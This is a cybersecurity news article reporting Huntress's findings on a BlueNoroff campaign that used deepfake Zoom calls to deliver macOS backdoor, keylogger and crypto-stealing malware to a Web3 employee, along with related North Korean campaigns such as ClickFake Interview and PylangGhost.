BlueNoroff Deploys Deepfake Zoom Scam Targeting Cryptocurrency Employee with MacOS Backdoor Malware

A North Korea-aligned threat actor, identified as BlueNoroff, has been engaged in an attack targeting an employee within the Web3 sector by orchestrating deceptive Zoom calls featuring deepfakes of company executives. The objective was to manipulate the victim into installing malware on their Apple macOS devices.

Details surrounding the cyber intrusion were disclosed by Huntress, indicating that the victim was associated with a cryptocurrency foundation and had received a message from an external contact via Telegram. This communication included a request to schedule a meeting, where a Calendly link was provided to arrange the discussion.

Upon clicking the Calendly link, the employee was redirected to a fraudulent Zoom domain under the control of the attacker. After several weeks, the employee participated in a Zoom meeting that included deepfake representations of known senior leaders from their organization, along with other external participants.

During the meeting, when the employee indicated an issue with their microphone, the synthetic personas urged them to download a Zoom extension to resolve the problem. The extension, shared through Telegram, led to the installation of an AppleScript named “zoomsdksupport.scpt.” This script initially opened a legitimate webpage for the Zoom software development kit (SDK) while stealthily downloading a secondary payload from a remote server and executing a shell script.

This shell script performed a series of actions, including disabling bash history logging and checking for the presence of Rosetta 2 on the compromised Mac. Should it be absent, the script would install it. Rosetta facilitates the operation of applications designed for Intel-based Macs on Apple silicon devices.

The script subsequently created a hidden file named “.pwd” and downloaded a binary from the malicious Zoom webpage into the “/tmp/icloud_helper” directory. Additionally, it sent out a request for another unspecified payload.

Moreover, the script prompted the user to input their system password and cleared the history of executed commands to eliminate traces of the attack. Investigations by Huntress revealed eight distinct malicious binaries present on the victim’s system:

• Telegram 2: A Nim-based binary that activates the primary backdoor.
• Root Troy V4: A comprehensive Go backdoor capable of executing remote AppleScript payloads and shell commands while also downloading and executing additional malware.
• InjectWithDyld: A C++ binary loader utilized by Root Troy V4 to deploy further payloads, including a benign Swift application for process injection and a separate Nim implant for asynchronous command issuance and response retrieval.
• XScreen: An Objective-C keylogger designed to capture keystrokes, clipboard activity, and screen content, transmitting the data to a command-and-control (C2) server.
• CryptoBot: A Go-based information stealer that can extract cryptocurrency-related files from the affected host.
• NetChk: An almost empty binary that endlessly generates random numbers.

BlueNoroff is also recognized under various aliases, including Alluring Pisces, APT38, and TA444. This subgroup of the Lazarus Group has a notable history of targeting financial institutions, cryptocurrency enterprises, and ATMs, with the aim of generating revenue for the Democratic People’s Republic of Korea (DPRK).

Notably, BlueNoroff is infamous for executing cryptocurrency heists such as “TraderTraitor,” which aimed at employees of organizations involved in blockchain research using malicious cryptocurrency trading applications. Among the significant breaches are the hacks of Bybit and Axie Infinity.

Huntress emphasized the importance of training remote employees in recognizing common social engineering attacks associated with remote meeting software, particularly in high-risk sectors. Recent assessments by DTEX indicated that the APT38 mission has likely fragmented, giving rise to new subgroups like TraderTraitor and CryptoCore, which are becoming the dominant forces in financial theft operations for the regime.

The threat landscape continues to evolve, with tactics such as using audio-related lures to deceive victims into compromising their own machines with malware mirroring an earlier campaign named Contagious Interview, which used ClickFix-type alerts to propagate malware called GolangGhost.

The latest iteration, referred to as ClickFake Interview, involves crafting fictitious job postings aimed at job seekers, tricking them into executing malicious commands under the guise of resolving camera and microphone access issues on a fraudulent website created by the attackers.

Cross-platform attacks have advanced to include a Python variant of GolangGhost, known as PylangGhost. These attacks primarily target Windows systems while maintaining a Golang-based version for macOS, with no current targeting of Linux users. PylangGhost operates by facilitating communication with a C2 server for remote control, file management, and credential theft from over 80 browser extensions, inclusive of password managers and cryptocurrency wallets.

It remains uncertain why the perpetrators chose to develop two variants in different programming languages, yet the structural similarities suggest close collaboration or a shared developmental resource.